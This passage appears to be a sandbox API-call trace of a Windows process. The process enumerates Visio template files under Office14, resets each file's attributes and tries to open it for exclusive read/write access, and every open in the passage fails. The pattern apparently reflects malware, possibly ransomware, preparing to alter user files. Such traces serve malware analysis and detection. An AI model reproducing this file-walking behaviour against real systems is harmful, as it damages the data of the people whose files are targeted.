lpFindFileData=0x29ac2e0) returned 1 [0137.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_M.VSS", dwFileAttributes=0x80) returned 0 [0137.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eletel_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.970] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_M.VST", dwFileAttributes=0x80) returned 0 [0137.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eletel_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.971] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.971] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.971] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_U.VSS", dwFileAttributes=0x80) returned 0 [0137.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eletel_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.972] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.972] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.972] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_U.VST", dwFileAttributes=0x80) returned 0 [0137.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ELETEL_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\eletel_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.973] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EMBELL_M.VSS", dwFileAttributes=0x80) returned 0 [0137.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EMBELL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\embell_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.974] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.974] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EMBELL_U.VSS", dwFileAttributes=0x80) returned 0 [0137.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EMBELL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\embell_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.974] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.974] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.974] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_M.VSS", dwFileAttributes=0x80) returned 0 [0137.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\entapp_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.975] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.975] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.975] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_M.VST", dwFileAttributes=0x80) returned 0 [0137.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\entapp_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.976] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.976] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.976] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_U.VSS", dwFileAttributes=0x80) returned 0 [0137.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\entapp_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.976] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.977] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.977] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_U.VST", dwFileAttributes=0x80) returned 0 [0137.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTAPP_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\entapp_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.977] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.977] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.977] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.978] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTITY_M.VSS", dwFileAttributes=0x80) returned 0 [0137.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTITY_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\entity_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.978] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.979] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.979] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTITY_U.VSS", dwFileAttributes=0x80) returned 0 [0137.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ENTITY_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\entity_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.979] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.979] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.979] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.979] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.979] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_M.VSS", dwFileAttributes=0x80) returned 0 [0137.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\epc_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.980] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.980] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.980] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_M.VST", dwFileAttributes=0x80) returned 0 [0137.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\epc_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.980] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.980] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.980] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_U.VSS", dwFileAttributes=0x80) returned 0 [0137.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\epc_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.981] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.981] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.981] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_U.VST", dwFileAttributes=0x80) returned 0 [0137.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EPC_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\epc_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.981] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.982] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EXCOBJ_M.VSS", dwFileAttributes=0x80) returned 0 [0137.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EXCOBJ_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\excobj_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.982] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.982] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EXCOBJ_U.VSS", dwFileAttributes=0x80) returned 0 [0137.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\EXCOBJ_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\excobj_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.983] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.983] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.983] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN1_M.VSS", dwFileAttributes=0x80) returned 0 [0137.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN1_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fastn1_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.983] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.984] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.984] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN1_U.VSS", dwFileAttributes=0x80) returned 0 [0137.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN1_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fastn1_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.984] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.984] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.984] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN2_M.VSS", dwFileAttributes=0x80) returned 0 [0137.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN2_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fastn2_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.985] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.985] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.985] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.985] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN2_U.VSS", dwFileAttributes=0x80) returned 0 [0137.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FASTN2_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fastn2_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.986] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_M.VSS", dwFileAttributes=0x80) returned 0 [0137.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fault_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.986] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_M.VST", dwFileAttributes=0x80) returned 0 [0137.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fault_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.987] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.987] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.987] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_U.VSS", dwFileAttributes=0x80) returned 0 [0137.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fault_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.987] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.988] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.988] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_U.VST", dwFileAttributes=0x80) returned 0 [0137.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FAULT_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\fault_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.988] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.988] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.988] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.988] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLOSHP_M.VSS", dwFileAttributes=0x80) returned 0 [0137.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLOSHP_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\floshp_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.989] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.989] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.989] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.989] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLOSHP_U.VSS", dwFileAttributes=0x80) returned 0 [0137.989] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLOSHP_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\floshp_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.989] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.989] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.989] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.989] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0137.990] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLRPLN_M.VST", dwFileAttributes=0x80) returned 0 [0137.990] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\FLRPLN_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\flrpln_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0137.990] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0137.990] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0137.990] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0137.990] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 